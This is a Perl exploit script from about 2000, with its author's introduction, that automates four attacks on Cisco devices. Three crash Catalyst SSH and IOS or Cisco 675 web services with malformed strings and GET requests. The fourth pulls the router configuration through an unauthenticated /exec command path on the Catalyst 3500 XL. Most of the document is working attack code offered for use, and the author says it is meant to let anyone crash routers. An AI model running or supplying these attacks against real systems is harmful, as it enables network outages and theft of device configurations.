thong.pl

`Written by hypoclear - http://hypoclear.cjb.net  
Thong-th-thong-th-thong.pl AKA thong.pl is a PERL script   
which automates several attacks against various Cisco products.   
To be specific:  
  
12-13-00 - Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability  
11-28-00 - Cisco 675 Web Administration Denial of Service Vulnerability  
10-26-00 - Cisco Catalyst 3500 XL Remote Arbitrary Command  
10-25-00 - Cisco IOS Software HTTP Request DoS Vulnerability   
  
You can find full descriptions of these vulnerabilities on  
www.securityfocus.com. If you read them and realize that they   
are all lame vulnerabilities, and are wondering why I wrote exploit  
scripts for them, this is why:  
1. I wanted to write an exploit for a Cisco product and name it  
after the "Thong Song". (Thanks to Ranger for giving me such lame ideas)  
2. Every vulnerability should have an exploit script, so lame script kiddies  
can crash routers, etc. with the best of them.  
3. I haven't released any security related stuff in a while (although  
this can hardly be considered a release).  
  
Well that's about all, have fun, and most importantly check my disclaimer  
on my site (hypoclear.cjb.net) before usage. I may add some other Cisco  
exploits to this, or I may not. If you have any constructive comments  
email them to [email protected].  
  
usage: ./thong.pl -h <host>  
After using the exploit either ping your host, or check to see if the   
service crashed. (Assuming that it is meant to crash).   
If it didn't work, try another option in the program.  
  
---begin cut---  
  
#!/usr/bin/perl  
  
use IO::Socket; use Getopt::Std;  
getopts('h:');  
  
  
if (defined $opt_h)  
{  
$HOST = $opt_h;   
$PORT;   
$STRING = "";   
$menu_opt = "";  
  
menu();  
computeOption();  
exploit();  
}  
  
else {print "\n\n usage ./thong.pl -h <host>\n\n"}  
  
  
sub menu   
{  
print "\n\n DATE VULNERABILITY  
1. 12-13-00 - Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability  
2. 11-28-00 - Cisco 675 Web Administration Denial of Service Vulnerability  
3. 10-26-00 - Cisco Catalyst 3500 XL Remote Arbitrary Command  
4. 10-25-00 - Cisco IOS Software HTTP Request DoS Vulnerability  
  
Enter Option: ";  
$menu_opt = <STDIN>;  
chomp ($menu_opt);  
}  
  
  
sub computeOption  
{  
if ($menu_opt == "1"){$PORT = 22; $STRING = "this ain't SSH";}  
elsif ($menu_opt == "2"){$PORT = 80; $STRING = "GET ? HTTP/1.0\n\n";}  
elsif ($menu_opt == "3"){$PORT = 80; three();}  
elsif ($menu_opt == "4"){$PORT = 80; $STRING = "GET /error?/ HTTP/1.0\n\n";}  
else {print "Select a real option!\n"; menu();}  
}  
  
  
sub three  
{  
print "Enter file to read or enter D for default (/show/config/cr): ";  
$key = <STDIN>;  
chomp ($key);  
print "\nGetting $key...";  
  
if (($key eq "D")||($key eq "d"))  
{  
print "\nGetting /show/config/cr...\n";   
$STRING = "GET /exec/show/config/cr HTTP/1.0\n\n";  
}  
else   
{  
print "\nGetting $key...\n";  
$STRING = "GET /exec$key HTTP/1.0\n\n";  
}  
}  
  
  
sub exploit  
{  
print "\n\ntrying to exploit $HOST...\n";  
  
$SOCKET = IO::Socket::INET->new(PeerAddr => $HOST,  
PeerPort => $PORT,  
Proto => "tcp")  
|| die "Couldn't connect to $HOST\n";  
  
print "\n$STRING\n";  
print $SOCKET "$STRING";  
  
if ($menu_opt == 3){while (<$SOCKET>){print}}  
  
close($SOCKET);  
}  
  
--- end cut---`